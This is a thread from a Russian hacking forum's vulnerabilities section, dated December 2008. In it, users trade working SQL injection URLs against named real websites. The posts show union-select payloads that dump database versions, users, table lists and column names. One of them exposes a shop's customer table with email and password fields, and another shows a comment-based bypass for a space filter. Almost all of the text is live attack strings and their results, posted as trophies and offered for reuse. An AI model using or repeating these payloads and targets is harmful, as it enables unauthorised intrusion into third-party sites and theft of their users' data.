ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7231  
Старый 29.12.2008, 11:44
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

http://www.emctc.ru/cgi-bin/db_new_logist.cgi?num=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name='item'--


CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
ALPHABET
ALPHABET_ENG
ANONS
BELARUS
BELARUS_V
CARRIERS
CARRIERS_ENG
CONTENT
CONTENT_ENG
CRYPTO
CUSTOMS
CUSTOMS1
CUST_BOD
CUST_BOD_ENG
CUST_BOD_MOS
CW
DEPARTMENTS
DEPARTMENTS_ENG
DOCS
DOCS1
DOCS2
DOCS_EMCTC
DOCS_ENG
DOCS_T
DUTYFREE
ECONOMY
ECONOMY_ENG
EMCTC_CONTENT
EMCTC_NEWS
EMCTC_NEWS_SECTIONS
EVROAZS
EVROAZS_ENG
HIT
INFRINGERS1
INFRINGERS2
KAZAHSTAN
KAZAHSTAN_V
KLIENTI
LINKS
LOGISTIC
LOGISTICRSS
LOGISTIC_ENG
NEWS
NEWSRSS
NEWS_ENG
OTO
POPULYR
PRACTICE
QUESTIONS_VCH
REFERATS
REVIEW
REVIEW_ENG
RUMORS
RUMORS_ENG
SEMINARS
SHIFR
SHIT
SearchStrings
TEMP
TEXT
TEXT_ENG
TW
UKRAINA
UKRAINA_V
VASYANYA
VTOROSSII
WAREHOUSES
aaa
banners
banners_eng
baz_sklad
doska_bodies
doska_headers
garant_banks
item
item_group
job_bodies
job_headers
price30
tam


мне кажется или все папки пустые?
 
Ответить с цитированием

  #7232  
Старый 29.12.2008, 15:01
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.claptonweb.com/boots/boot.php?id=-124+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17/*
5.0.45-Debian_1ubuntu3.3-log

Код:
http://www.cfsontario.ca/english/general.php?id=11111111111111111+union+select+1,2,3,version(),5,6,7,8,9,10,11/*
5.0.45-log

Код:
http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
Код:
http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
Код:
http://www.greetingcard.org/about.php?ID=-2+union+select+1,version(),3,4,5,6,7,8,9,10--
5.0.67

Код:
http://www.tptherapy.com/about.php?id=-19'+union+select+1,2,3,version(),5,6,7,8,9/*
4.1.22-standard

Код:
http://www.mlsoftball.com/about.php?ID=-2+union+select+1,2,version()/*
4.0.27-standard
Код:
http://www.palit.biz/main/about.php?id=-1+union+select+1,2,3,4,version(),6,7/*
4.1.21

Код:
http://www.demotech.org/d-about.php?id=-3+union+select+1,version(),3,4,5,6/*
5.0.32-Debian_7etch1

Код:
http://www.artmaterial.ru/about.php?content=dealer&id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*
4.1.22-standard-log

Код:
http://www.ywamyork.com/about/about.php?id=-11+union+select+1,version(),3,4,5,6,7,8,9--
5.0.67-community-log

Код:
http://www.personal.in.ua/article.php?ida=-346+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
4.1.22

Код:
http://www.brain-storming.info/article.php?ida=-70+union+select+1/*
 
Ответить с цитированием

  #7233  
Старый 29.12.2008, 15:50
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

http://www.projector-club.ru/index.php?id=9&manuf=-1+union+select+user(),2,3,version(),5,6,7,8,9,10,1 1,12,database(),14,15,16,17,18,19,20--

olimpor_project@localhost
olimpor_projector
4.1.22-standard-log
 
Ответить с цитированием

  #7234  
Старый 29.12.2008, 16:00
I love this game
Познающий
Регистрация: 23.12.2008
Сообщений: 81
Провел на форуме:
460763

Репутация: 97
Отправить сообщение для I love this game с помощью ICQ
По умолчанию

Код:
_http://en.apa.az/news.php?id=-89125+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
5.0.67-community

Код:
_http://www.aupe.org/in_the_news/news.php?id=-993+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
4.0.18

Код:
_http://www.avezdoaluno.com.br/navegacao/prof.php?id=-53+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15--
5.0.67-log


Последний раз редактировалось I love this game; 29.12.2008 в 16:08..
 
Ответить с цитированием

  #7235  
Старый 29.12.2008, 19:49
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

http://www.mibf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

Я ослеп!!!
 
Ответить с цитированием

  #7236  
Старый 29.12.2008, 23:03
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Tkastrey.ru - PR5 ~4к
Цитата:
http://www.tkastrey.ru/article.php?aid=588+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14/*
логический вывод 4 ветка..

Arkhangel.ru - PR3 ~5к
Цитата:
http://www.arkhangel.ru/?a=-43+union+select+1,2,concat_ws(0x3a,table_name),4,5 ,6,7+from+information_schema.columns+where+column_ name+like+0x6c6f67696e/*
5 ветка, в базе нету табл форума(

Последний раз редактировалось sabe; 29.12.2008 в 23:05..
 
Ответить с цитированием

  #7237  
Старый 29.12.2008, 23:19
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

гы-гы, http://arkhangel.ru/phpBB2/

понятно, что нет
 
Ответить с цитированием

  #7238  
Старый 29.12.2008, 23:32
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от cash$$$  
Код:
http://independentshop.de/content.php?content_type=99999+union+select+1,vers ion(),user()/*
version: 4.0.27-standard
user: dbo162775637@localhost
database: db162775637
Тоже буду подарки на НГ делать)

Найденные таблицы:
-------
article
content
customer
news
orders
partner
session
shops
-------
=============================
Найденные колонки из таблицы customer:
-------
email
password
status
username
=============================

Последний раз редактировалось Pashkela; 29.12.2008 в 23:34..
 
Ответить с цитированием

  #7239  
Старый 29.12.2008, 23:43
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию

Поясните, что за дрянь, уже порядка трех десятков с такой дрянью нашел:
http://www.ac-alp.ru/part/index.php?id=-42+order+by+10--
А он мне пишет:
Цитата:
Bad Request
Your browser sent a request that this server could not understand.
The request line contained invalid characters following the protocol string.
 
Ответить с цитированием

  #7240  
Старый 30.12.2008, 00:14
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

vladvk Это фильтрация "+", " ", не знаю , может ещё чего не смотрел )
http://www.ac-alp.ru/part/index.php?id=-41/**/union/**/select/**/1,2,concat_ws(0x3a,User(),Database(),Version()),4, 5,6,7

PS Вопросы в соседней теме (на будующее)
PPS
Цитата:
Сообщение от -m0rgan-  
Нету прав...
Я же Вас просил. не писать охинею

Последний раз редактировалось jokester; 30.12.2008 в 00:22..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ